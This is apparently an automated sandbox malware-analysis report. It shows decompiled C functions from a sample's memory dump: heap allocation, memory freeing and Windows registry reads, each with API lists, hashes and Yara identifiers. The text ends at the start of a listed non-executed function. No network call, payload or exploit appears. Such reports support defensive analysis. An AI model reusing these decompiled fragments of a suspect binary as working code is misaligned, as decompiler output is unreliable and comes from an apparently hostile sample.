                                                                                                • Instruction Fuzzy Hash: 02F0AF3140020CBBCF009FA1ED05EEE376CFB44759F10412AB905AA1A1E6359E44DB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043E2C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E0043E2C1(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t15;
				signed int _t16;

				if( *0x46d4d0 == 0) {
					_push(_t15);
					E00448529(__ecx); // executed
					_t2 = E0044882A(); // executed
					_t19 = _t2;
					if(_t2 != 0) {
						_t3 = E0043E36E(__ebx, _t19);
						if(_t3 != 0) {
							 *0x46d4dc = _t3;
							E0043750E(0x46d4d0, _t3);
							_t16 = 0;
						} else {
							_t16 = _t15 | 0xffffffff;
						}
						E004414D5(0);
					} else {
						_t16 = _t15 | 0xffffffff;
					}
					E004414D5(_t19);
					return _t16;
				} else {
					return 0;
				}
			}







                                                                                                0x0043e2c8
                                                                                                0x0043e2ce
                                                                                                0x0043e2cf
                                                                                                0x0043e2d4
                                                                                                0x0043e2d9
                                                                                                0x0043e2dd
                                                                                                0x0043e2e5
                                                                                                0x0043e2ed
                                                                                                0x0043e2fa
                                                                                                0x0043e2ff
                                                                                                0x0043e304
                                                                                                0x0043e2ef
                                                                                                0x0043e2ef
                                                                                                0x0043e2ef
                                                                                                0x0043e308
                                                                                                0x0043e2df
                                                                                                0x0043e2df
                                                                                                0x0043e2df
                                                                                                0x0043e30f
                                                                                                0x0043e319
                                                                                                0x0043e2ca
                                                                                                0x0043e2cc
                                                                                                0x0043e2cc

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: @e
                                                                                                • API String ID: 269201875-2994471477
                                                                                                • Opcode ID: 418404c469e31834df15ed37849df1d11274e996d35f1cd43b37576d47145671
                                                                                                • Instruction ID: f9ed7ad6c89ae7cb51d312edb681146ff5a8de6a00b71520938e44ab78725240
                                                                                                • Opcode Fuzzy Hash: 418404c469e31834df15ed37849df1d11274e996d35f1cd43b37576d47145671
                                                                                                • Instruction Fuzzy Hash: FDE06D22E0752061E626363B6C0976F05599BC9339F21526FF8268B6D1EFBC8C4741AF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004108B4, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E004108B4(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12);
				return RegCloseKey(_v8) & 0xffffff00 | _t18 == 0x00000000;
			}









                                                                                                0x004108bc
                                                                                                0x004108bd
                                                                                                0x004108c0
                                                                                                0x004108d4
                                                                                                0x004108dc
                                                                                                0x00000000
                                                                                                0x0041090b
                                                                                                0x004108f2
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108D4
                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 004108F2
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004108FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 649c45392d5ae1558f032711ae3bb036d6acd2cd9c947e5aeeecad681845a9bc
                                                                                                • Instruction ID: 63855dda8fb632bf1beee0559157bc493b1c2f3c72ca86b31d45f6512f352132
                                                                                                • Opcode Fuzzy Hash: 649c45392d5ae1558f032711ae3bb036d6acd2cd9c947e5aeeecad681845a9bc
                                                                                                • Instruction Fuzzy Hash: 64F0127690020CBFDF109FE09C45FED7B7CEB44B15F104065BA05E6151D2759A94DB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00410911, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 66%
                                                                                                			E00410911(void* __ecx, void* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				char _v1036;
				long _t11;
				void* _t19;
				void* _t23;

				_v12 = 0x400;
				_t23 = __ecx;
				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
				if(_t11 != 0) {
					_push(0x460734);
				} else {
					RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
					RegCloseKey(_v8);
					_push( &_v1036);
				}
				E00402076(_t19, _t23);
				return _t23;
			}









                                                                                                0x0041091e
                                                                                                0x00410930
                                                                                                0x00410933
                                                                                                0x0041093b
                                                                                                0x0041096a
                                                                                                0x0041093d
                                                                                                0x00410952
                                                                                                0x0041095b
                                                                                                0x00410967
                                                                                                0x00410967
                                                                                                0x00410971
                                                                                                0x0041097c

                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410933
                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410952
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0041095B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: ff4d1dda1717e8bfa00f59fc3920b61803ba0fd0455c11c174dae0c8643a1a4d
                                                                                                • Instruction ID: 05d1a431d63dd8663231bebc481d82b76f22a5c318b4534d80a30b1479a232ce
                                                                                                • Opcode Fuzzy Hash: ff4d1dda1717e8bfa00f59fc3920b61803ba0fd0455c11c174dae0c8643a1a4d
                                                                                                • Instruction Fuzzy Hash: C6F0C2B560020CBBEB109B80DD05FED777CEB44B05F2040A6BB05B6191D6B5AE85ABA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401646, Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 64%
                                                                                                			E00401646(signed int _a4, signed int _a8, char _a12) {
				intOrPtr _v16;
				char _v20;
				intOrPtr _v32;
				char _v36;
				char _v52;
				void* __esi;
				signed int _t21;
				signed int _t22;
				signed int _t24;
				intOrPtr _t40;
				signed int _t42;
				signed int _t43;
				signed int _t45;
				char* _t48;
				signed int _t53;
				char* _t55;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t63;
				void* _t64;
				void* _t67;
				void* _t68;

				_t61 = _t67;
				_t42 = _a4;
				if(_t42 != 0) {
					_t22 = _t21 | 0xffffffff;
					_t53 = _t22 % _a8;
					__eflags = _t22 / _a8 - _t42;
					if(_t22 / _a8 >= _t42) {
						_t43 = _t42 * _a8;
						__eflags = _a12;
						if(__eflags == 0) {
							L8:
							_t24 = E0042FF6D(_t53, _t57, __eflags, _t43); // executed
							_t45 = _t24;
							goto L9;
						} else {
							__eflags = _t43 - 0x1000;
							if(__eflags < 0) {
								goto L8;
							} else {
								_t26 = _t43 + 0x23;
								__eflags = _t43 + 0x23 - _t43;
								if(__eflags <= 0) {
									goto L3;
								} else {
									_t40 = E0042FF6D(_t53, _t57, __eflags, _t26);
									_t11 = _t40 + 0x23; // 0x23
									_t45 = _t11 & 0xffffffe0;
									 *((intOrPtr*)(_t45 - 4)) = _t40;
									L9:
									return _t45;
								}
							}
						}
					} else {
						L3:
						_push(_t61);
						_t63 = _t67;
						_t68 = _t67 - 0xc;
						E00430684( &_v20);
						E00432EDA( &_v20, 0x468dbc);
						asm("int3");
						_push(_t63);
						_t64 = _t68;
						E00430C86( &_v36, _v16);
						E00432EDA( &_v36, 0x468e4c);
						asm("int3");
						_push(_t64);
						_t48 =  &_v52;
						E00430CDD(_t48, _v32);
						E00432EDA( &_v52, 0x468e88);
						asm("int3");
						_t55 = _t48;
						__eflags = 1;
						asm("lock xadd [0x46c024], eax");
						if(1 == 0) {
							_push(_t57);
							_t58 = 0x46d050;
							do {
								E00431635(_t58);
								_t58 = _t58 + 0x18;
								__eflags = _t58 - 0x46d110;
							} while (_t58 < 0x46d110);
						}
						return _t55;
					}
				} else {
					return 0;
				}
			}


























                                                                                                0x00401647
                                                                                                0x00401649
                                                                                                0x0040164e
                                                                                                0x00401654
                                                                                                0x00401659
                                                                                                0x0040165c
                                                                                                0x0040165e
                                                                                                0x00401665
                                                                                                0x00401669
                                                                                                0x0040166d
                                                                                                0x00401690
                                                                                                0x00401691
                                                                                                0x00401697
                                                                                                0x00000000
                                                                                                0x0040166f
                                                                                                0x0040166f
                                                                                                0x00401675
                                                                                                0x00000000
                                                                                                0x00401677
                                                                                                0x00401677
                                                                                                0x0040167a
                                                                                                0x0040167c
                                                                                                0x00000000
                                                                                                0x0040167e
                                                                                                0x0040167f
                                                                                                0x00401685
                                                                                                0x00401688
                                                                                                0x0040168b
                                                                                                0x00401699
                                                                                                0x0040169c
                                                                                                0x0040169c
                                                                                                0x0040167c
                                                                                                0x00401675
                                                                                                0x00401660
                                                                                                0x00401660
                                                                                                0x00430d2b
                                                                                                0x00430d2c
                                                                                                0x00430d2e
                                                                                                0x00430d34
                                                                                                0x00430d42
                                                                                                0x00430d47
                                                                                                0x00430d48
                                                                                                0x00430d49
                                                                                                0x00430d54
                                                                                                0x00430d62
                                                                                                0x00430d67
                                                                                                0x00430d68
                                                                                                0x00430d6e
                                                                                                0x00430d74
                                                                                                0x00430d82
                                                                                                0x00430d87
                                                                                                0x00430d8b
                                                                                                0x00430d8d
                                                                                                0x00430d8e
                                                                                                0x00430d96
                                                                                                0x00430d98
                                                                                                0x00430d99
                                                                                                0x00430d9e
                                                                                                0x00430d9f
                                                                                                0x00430da4
                                                                                                0x00430da8
                                                                                                0x00430da8
                                                                                                0x00430db0
                                                                                                0x00430db4
                                                                                                0x00430db4
                                                                                                0x00401650
                                                                                                0x00401653
                                                                                                0x00401653

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 25837c2cbf3204a2a259ad223c0ab53f0258c59322690b9cce00b5bc75b07f48
                                                                                                • Instruction ID: 2d1efc8c66fadbda5e17c089614162597299918c7674b8c1b7db7f5a2b4967d3
                                                                                                • Opcode Fuzzy Hash: 25837c2cbf3204a2a259ad223c0ab53f0258c59322690b9cce00b5bc75b07f48
                                                                                                • Instruction Fuzzy Hash: 06F0BE722142085BDB0C9E349D51A7E379D5B05368B684B3FF02FDA2E1DB3AE985864C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00402CFF, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00402CFF(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				unsigned int _t29;
				signed int _t34;
				void* _t38;
				void* _t42;
				void* _t43;
				signed int _t49;
				intOrPtr _t52;
				unsigned int _t55;
				unsigned int _t71;
				signed int _t77;
				void* _t79;
				void* _t81;

				_t52 = __ecx;
				E00452248(E004537A4, _t79);
				 *((intOrPtr*)(_t79 - 0x10)) = _t81 - 0x10;
				_t73 = _t52;
				 *((intOrPtr*)(_t79 - 0x18)) = _t52;
				_t77 =  *(_t79 + 8) | 0x0000000f;
				_t49 = E00402E3E(_t52);
				if(_t49 >= _t77) {
					_t29 =  *(E004027A7());
					 *(_t79 - 0x1c) = _t29;
					_t55 = _t29 >> 1;
					 *(_t79 - 0x14) = 3;
					if(_t55 > _t77 /  *(_t79 - 0x14)) {
						_t71 =  *(_t79 - 0x1c);
						_t77 = _t55 + _t71;
						if(_t71 > _t49 - _t55) {
							_t77 = _t49;
						}
					}
				} else {
					_t77 =  *(_t79 + 8);
				}
				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
				_t17 = _t77 + 1; // 0x1
				E00402200(_t73);
				_t34 = E00402EB2(_t17); // executed
				 *(_t79 - 0x14) = _t34;
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				_t50 =  *((intOrPtr*)(_t79 + 0xc));
				if( *((intOrPtr*)(_t79 + 0xc)) != 0) {
					_t43 = E0040223A(_t73);
					E004015F7(E00403121( *(_t79 - 0x14)), _t43, _t50);
				}
				E004023CA(_t50, _t73, 1, 0);
				_t38 = E00403121(E0040212E(_t73));
				E00403199(E00402200(_t73), _t38, _t79 - 0x14);
				 *(E004027A7()) = _t77;
				_t42 = E00402982(_t50);
				 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
				return _t42;
			}
















                                                                                                0x00402cff
                                                                                                0x00402d04
                                                                                                0x00402d0f
                                                                                                0x00402d12
                                                                                                0x00402d14
                                                                                                0x00402d1a
                                                                                                0x00402d22
                                                                                                0x00402d26
                                                                                                0x00402d34
                                                                                                0x00402d36
                                                                                                0x00402d3b
                                                                                                0x00402d41
                                                                                                0x00402d4d
                                                                                                0x00402d53
                                                                                                0x00402d58
                                                                                                0x00402d5b
                                                                                                0x00402d5d
                                                                                                0x00402d5d
                                                                                                0x00402d5b
                                                                                                0x00402d28
                                                                                                0x00402d28
                                                                                                0x00402d28
                                                                                                0x00402d5f
                                                                                                0x00402d63
                                                                                                0x00402d69
                                                                                                0x00402d70
                                                                                                0x00402d75
                                                                                                0x00402d78
                                                                                                0x00402db6
                                                                                                0x00402dbb
                                                                                                0x00402dc0
                                                                                                0x00402dd0
                                                                                                0x00402dd5
                                                                                                0x00402dde
                                                                                                0x00402def
                                                                                                0x00402dff
                                                                                                0x00402e0b
                                                                                                0x00402e10
                                                                                                0x00402e18
                                                                                                0x00402e25

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prolog
                                                                                                • String ID:
                                                                                                • API String ID: 3519838083-0
                                                                                                • Opcode ID: 0c29e88675947b247337350fecebc8e139c70f3754e2f597b147425d88c782ff
                                                                                                • Instruction ID: 3dd5ab6fcd1e10ff401d729f84c4ff9e1b7a33febeac1901b83a7dd24140b9ff
                                                                                                • Opcode Fuzzy Hash: 0c29e88675947b247337350fecebc8e139c70f3754e2f597b147425d88c782ff
                                                                                                • Instruction Fuzzy Hash: 53219371B001055BCB05FFA68A8A6BEB6AAAF84315F10403FF415BB2C2DBBC5E019795
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004495A4, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 91%
                                                                                                			E004495A4(void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t35;

				_push(_t26);
				_push(_t26);
				_t16 = E00440628(_t26, 0x40, 0x30); // executed
				_t31 = _t16;
				_v12 = _t31;
				_t28 = _t30;
				if(_t31 != 0) {
					_t2 = _t31 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t31 - _t17;
					if(__eflags != 0) {
						_t3 = _t31 + 0x20; // 0x20
						_t35 = _t3;
						_t33 = _t17;
						do {
							_t4 = _t35 - 0x20; // 0x0
							E004437D7(_t28, _t35, __eflags, _t4, 0xfa0, 0);
							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
							 *_t35 = 0;
							_t35 = _t35 + 0x30;
							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
							 *((char*)(_t35 - 0x24)) = 0xa;
							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
							 *((char*)(_t35 - 0x22)) = 0;
							__eflags = _t35 - 0x20 - _t33;
						} while (__eflags != 0);
						_t31 = _v12;
					}
				} else {
					_t31 = 0;
				}
				E004414D5(0);
				return _t31;
			}













                                                                                                0x004495a9
                                                                                                0x004495aa
                                                                                                0x004495b1
                                                                                                0x004495b6
                                                                                                0x004495ba
                                                                                                0x004495be
                                                                                                0x004495c1
                                                                                                0x004495c7
                                                                                                0x004495c7
                                                                                                0x004495cd
                                                                                                0x004495cf
                                                                                                0x004495d2
                                                                                                0x004495d2
                                                                                                0x004495d5
                                                                                                0x004495d7
                                                                                                0x004495dd
                                                                                                0x004495e1
                                                                                                0x004495e6
                                                                                                0x004495ea
                                                                                                0x004495ec
                                                                                                0x004495ef
                                                                                                0x004495f5
                                                                                                0x004495fc
                                                                                                0x00449600
                                                                                                0x00449604
                                                                                                0x00449607
                                                                                                0x00449607
                                                                                                0x0044960b
                                                                                                0x0044960e
                                                                                                0x004495c3
                                                                                                0x004495c3
                                                                                                0x004495c3
                                                                                                0x00449610
                                                                                                0x0044961d

                                                                                                APIs
                                                                                                  • Part of subcall function 00440628: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044301D,00000001,00000364,?,?,?,00438937,00440CAF,?,?,0042FF99,?), ref: 00440669
                                                                                                • _free.LIBCMT ref: 00449610
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 614378929-0
                                                                                                • Opcode ID: 3172957cdbbe993f15e52bde747a3cb1a13adf3dac6d71025a6804c7a1a525b1
                                                                                                • Instruction ID: ec0a6b97cc5370c94aaac90878acb0e244b80713cb422e23bfe0f730aee142eb
                                                                                                • Opcode Fuzzy Hash: 3172957cdbbe993f15e52bde747a3cb1a13adf3dac6d71025a6804c7a1a525b1
                                                                                                • Instruction Fuzzy Hash: 8F01D6722003456BF721CF66988195BFBE9EBC5370F25062EE58497680EA34AD45C768
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00440628, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E00440628(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x46da48, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E0044007A();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00438932())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E0043DAF9(_t15, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}










                                                                                                0x00440628
                                                                                                0x0044062e
                                                                                                0x00440633
                                                                                                0x00440641
                                                                                                0x00440641
                                                                                                0x00440647
                                                                                                0x00440649
                                                                                                0x00440649
                                                                                                0x00440660
                                                                                                0x00440669
                                                                                                0x00440671
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440651
                                                                                                0x00440653
                                                                                                0x00440675
                                                                                                0x0044067a
                                                                                                0x00440680
                                                                                                0x00000000
                                                                                                0x00440680
                                                                                                0x00440656
                                                                                                0x0044065b
                                                                                                0x0044065c
                                                                                                0x0044065e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044065e
                                                                                                0x00000000
                                                                                                0x00440660
                                                                                                0x00440639
                                                                                                0x0044063f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044301D,00000001,00000364,?,?,?,00438937,00440CAF,?,?,0042FF99,?), ref: 00440669
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 27a20f07b0b9ea4f322eb06bd30b8c404bd0c6a2f8702a4b3de09eb56e68ad74
                                                                                                • Instruction ID: f1932c8e73fcd017ea8e96c946db2f3894439211089cf3beed1ca8db1b1f566c
                                                                                                • Opcode Fuzzy Hash: 27a20f07b0b9ea4f322eb06bd30b8c404bd0c6a2f8702a4b3de09eb56e68ad74
                                                                                                • Instruction Fuzzy Hash: 1AF0593160422477BB212A72AC05B1B3748AFC1774F168027FE06DB280CBBCD83146ED
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00440C6C, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E00440C6C(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00438932())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x46da48, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0044007A();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E0043DAF9(_t7, _t8, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}








                                                                                                0x00440c6c
                                                                                                0x00440c72
                                                                                                0x00440c78
                                                                                                0x00440caa
                                                                                                0x00440caf
                                                                                                0x00440cb5
                                                                                                0x00000000
                                                                                                0x00440cb5
                                                                                                0x00440c7c
                                                                                                0x00440c7e
                                                                                                0x00440c7e
                                                                                                0x00440c95
                                                                                                0x00440c9e
                                                                                                0x00440ca6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440c86
                                                                                                0x00440c88
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440c8b
                                                                                                0x00440c90
                                                                                                0x00440c91
                                                                                                0x00440c93
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440c93
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: b87b444b0689b1bc68484dc88c6e83230c6fa494c1aa18da1c5914e8eab98513
                                                                                                • Instruction ID: 5852c7a619ddf7c9f9a534c792c37e70b0b3578afb37ceb8504e161c82b667f1
                                                                                                • Opcode Fuzzy Hash: b87b444b0689b1bc68484dc88c6e83230c6fa494c1aa18da1c5914e8eab98513
                                                                                                • Instruction Fuzzy Hash: DEE0E531548620DAF6243666AC40B5B3A4CAF913A1F100327AE429A290CB7CCC2146ED
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 00406AEE, Relevance: 35.7, APIs: 7, Strings: 13, Instructions: 691COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 83%
                                                                                                			E00406AEE(short* __edx, void* __eflags, intOrPtr _a4) {
				char _v132;
				char _v136;
				char _v152;
				void* _v156;
				char _v160;
				char _v168;
				char _v176;
				char _v180;
				char _v184;
				void* _v200;
				char _v204;
				char _v216;
				void* _v224;
				void* _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v248;
				char _v252;
				char _v256;
				void* _v260;
				char _v264;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				void* _v324;
				void* _v332;
				char _v336;
				char _v348;
				char _v356;
				char _v360;
				char _v392;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t160;
				signed int _t162;
				void* _t166;
				void* _t171;
				signed int _t172;
				void* _t187;
				void* _t202;
				signed int _t204;
				void* _t218;
				int _t228;
				void* _t235;
				void* _t236;
				void* _t249;
				void* _t256;
				signed int _t261;
				void* _t265;
				void* _t277;
				short* _t288;
				void* _t289;
				void* _t300;
				void* _t316;
				void* _t326;
				void* _t332;
				void* _t334;
				void* _t336;
				void* _t340;
				void* _t344;
				void* _t354;
				void* _t356;
				void* _t376;
				void* _t379;
				void* _t541;
				intOrPtr _t573;
				intOrPtr _t574;
				signed int _t575;
				signed int _t577;
				signed int _t580;
				void* _t586;
				void* _t588;
				void* _t590;
				void* _t592;
				void* _t594;
				signed int _t595;
				void* _t598;
				void* _t599;
				void* _t600;
				void* _t601;
				void* _t602;
				void* _t603;
				void* _t604;
				void* _t607;
				void* _t611;
				void* _t612;
				void* _t613;
				void* _t615;
				void* _t617;
				void* _t636;
				void* _t637;
				void* _t638;
				void* _t639;
				void* _t642;
				void* _t644;

				_t643 = __eflags;
				_t549 = __edx;
				_push(_t356);
				_t573 = _a4;
				E004020DE(_t356,  &_v180, __edx, __eflags, _t573 + 0xc);
